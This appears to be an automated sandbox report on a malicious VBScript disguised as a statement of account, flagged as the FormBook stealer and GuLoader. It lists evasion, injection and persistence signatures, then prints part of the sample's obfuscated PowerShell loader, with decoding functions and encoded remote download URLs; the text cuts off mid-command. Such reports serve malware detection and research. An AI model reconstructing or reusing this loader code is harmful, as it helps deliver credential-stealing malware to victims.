Edit tour
Windows
Analysis Report
Statement_of_account.vbs
Overview
General Information
| Sample name: | Statement_of_account.vbs |
| Analysis ID: | 1557901 |
| MD5: | 716e2fa9002b3b3e13e077f879378b3a |
| SHA1: | f282e6587ab4d2e6c2d49b1bd8a7da32e3118697 |
| SHA256: | d05c1fe141254dd92d2eda0d3855d3834a69f985b6ff33535e03a0b5ecdee0ac |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6480 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\State ment_of_ac count.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6776 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Collybi a Journali sation Utu gtsforhold Muttonbir d motorise rende #><# Alkyder Ek stinktion Frdigpakke nde Instit utionalise Ombromete r Ttl Arke type #>$Pe nthiophen= 'Unintervi ewed';func tion Manne d($Presubm itting){If ($host.De buggerEnab led) {$Rep =5} for ($ Energibeho v=$Rep;;$E nergibehov +=6){if(!$ Presubmitt ing[$Energ ibehov]) { break }$V erdour+=$P resubmitti ng[$Energi behov]}$Ve rdour}func tion svaj( $Angloamer ikanske){ .($Spredni ngseffekte r) ($Anglo amerikansk e)}$Dichlo rvos45=Man ned 'Pa kl NN.naceMis rotarene.P rereWCh la eMuscabWre stcambasl SamlI Sane ESprjtNPic kwT';$Offi cershlene= Manned ' G ranM.ffeno Voro zSu a riKompalhe spelSkarpa Kasse/';$K analjens=M anned 'Vrf teTFlyoflB eatssRepol 1Perve2';$ Abjectness es='Unrea[ Sacc.NDeli resubprTSc hoo. agtss HudsoESta frBrugevim porIEnscoC ProagePect ipEmpieoOu tfoI Begnn UroceTBo a iM Adi ALu trenAfnata UnlusGIn u iETopvirBe ri]Minut: Bully:Lame nsjord EDa ivacScia u BusbaRVapo ri lyntmil liY NarkP TilrRVinde OPro,rTMic roOMell ci socloElect LDomor=Fll e,$ lod KW ipinAFagg NStadsABri llL Par jH aidueDistr nLatinS';$ Officershl ene+=Manne d ' ega5Jo cum.Slamb0 Rnner Folk (ShrewWSca veiAfluknG unnidBe je oO nubwPl ntsCatec L ovmeNOrlo, TSteni Une xi1 cadd0 Belg.Disen 0 ilba;L g tu KvartWy ac tiFodbo nA ino6Dy, sv4Filac;T ipon Smash xDissa6sty re4Fr tr; U de Purpu r KbehvLyg ae:Fl es1R e er3 ence 1Falte.Gas ,r0Svamp)x er d raadG Sib seReob cEup okke ithoUnsur/ Apost2 ipv 0Klubc1Man ag0Bavar0c itro1Sekre 0pena 1 al li procaFC ytobiSpise rUndeseKo muf V,tioc ontixRagee /F ann1Non te3Corms1B ew,l. Kalv 0';$Myoalb umose=Mann ed ',lipsU DelirSLa d seIndelRSi ngu- amebA TidewgIhuk .eagoninmi rint';$Ena rration=Ma nned 'Cloc kh Litot S krutStormp ArkitsTipp e: Tare/Bi ,li/Interh UncoeHaor .aRestrv D o eyPaleoe WagoqCrys .uHpsteiAl t ipU aarm S,eeeFilt en N njtCo rkes Kreda Rattll Mep he Rhi sSh ala.Cozeda GableuEthi c/ lycaSen sod F ulmG r,teiElekt n Orga/Mus icVLerpfeD j elrM ndi dPrepoePro rnMoralsS licaManag l DesitEx os.Agg,oaO utfis Real iNavel>J.r ibhSerbetN onr,tUn lo p Sjlss In .r: F.br/d ori./bedli qLig.tp Pu gh.FdsellT ysseq Twaz a relae Me llbIs gnoK orve2Foret . EthnrGra ziuTovtr.G run.cVrdi oUbanemrel ax/Forewa Procdregns mLa ysikro ejnAbjur/P andeVForla e .iderOph redRenkueG ra nn Sinn sZemayaSub julParaltT .rmi.Epige a E.onsUnc iri';$Aler ion194=Man ned 'Brand >';$Spredn ingseffekt er=Manned 'ShiftITwi tEPolysX' ;$Dioxinbe grnsning=' Esthesioge n';$Oprykn ingerne3=' \Fakers.Sp o';svaj (M anned ' Re sh$ AkupgU n,seLAntig OUnc.hBLy kraDeprel Li a:Rekre EAfluskCya neSTuathT outvR Elwi